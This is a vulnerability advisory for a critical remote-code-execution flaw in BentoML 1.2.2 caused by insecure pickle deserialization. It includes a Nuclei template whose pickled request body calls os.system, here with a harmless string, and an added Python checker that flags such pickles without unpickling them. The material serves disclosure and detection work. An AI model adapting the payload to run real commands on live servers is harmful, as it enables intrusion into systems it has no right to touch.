Critical

bentoml

Remote Code Execution via Insecure Deserialization in BentoML

BentoML version 1.2.2 is vulnerable to remote code execution (RCE) through insecure deserialization, allowing attackers to execute arbitrary code by sending a malicious POST request. This vulnerability was patched in version 1.2.5.

Available publicly on Apr 16 2024

CVSS: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Nuclei Template
id: bentoml-rce
info:
  name: BentoML Insecure Deserialization RCE Simulation
  author: DanMcInerney, byt3bl33d3r, pinkdraconian
  severity: critical
  description: Simulates an insecure deserialization attack on BentoML to trigger remote code execution. Binary data is string "protectai" pickled.
  reference:
    - https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-1188 # Insecure Default Initialization of Resource
  tags: bentoml, rce, deserialization, protectai, huntr, ai, machine-learning
requests:
  - method: POST
    path:
      - "{{BaseURL}}/summarize"
    headers:
      Content-Type: "application/vnd.bentoml+pickle"
    body: !!binary |
      gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4=
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Input should be a valid dictionary or instance of Input"
        part: body
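
A defender-side check for the request shape this template sends, as an added example that is not part of the original advisory or of BentoML's code: it disassembles a pickle body with `pickletools` without ever unpickling it and flags any import, such as the one in the template body. The function names and the flagging policy are assumptions made for illustration.

```python
import base64
import pickletools

# Request body from the Nuclei template on this page (base64 of the pickle bytes).
TEMPLATE_BODY_B64 = "gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4="
PICKLE_CONTENT_TYPE = "application/vnd.bentoml+pickle"  # header used by the template

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}
CALL_OPS = {"REDUCE", "OBJ", "INST", "NEWOBJ", "NEWOBJ_EX"}  # invoke a callable


def inspect_pickle(data: bytes) -> dict:
    """Walk the opcode stream with pickletools.genops; nothing is ever unpickled."""
    imports, calls, strings = [], [], []
    try:
        for op, arg, _pos in pickletools.genops(data):
            if op.name in STRING_OPS:
                strings.append(arg)
            if op.name in ("GLOBAL", "INST"):
                imports.append(arg.replace(" ", "."))  # arg is "module name"
            elif op.name == "STACK_GLOBAL":
                # Module and attribute are normally the last two pushed strings;
                # memo lookups can hide them, so the opcode is recorded either way.
                imports.append(".".join(strings[-2:]) or "<unresolved>")
            if op.name in CALL_OPS:
                calls.append(op.name)
    except Exception as exc:  # truncated or non-pickle bytes
        return {"parsed": False, "imports": imports, "calls": calls, "error": str(exc)}
    return {"parsed": True, "imports": imports, "calls": calls, "error": None}


def is_suspicious(content_type: str, body: bytes) -> bool:
    """Flag pickle-typed requests that import anything or do not parse cleanly."""
    if content_type.split(";")[0].strip().lower() != PICKLE_CONTENT_TYPE:
        return False
    report = inspect_pickle(body)
    return (not report["parsed"]) or bool(report["imports"])


if __name__ == "__main__":
    body = base64.b64decode(TEMPLATE_BODY_B64)
    print(inspect_pickle(body))
    print(is_suspicious(PICKLE_CONTENT_TYPE, body))
```

Upgrading to 1.2.5, the patched version named above, is the fix; a check like this only helps triage logged or proxied request bodies.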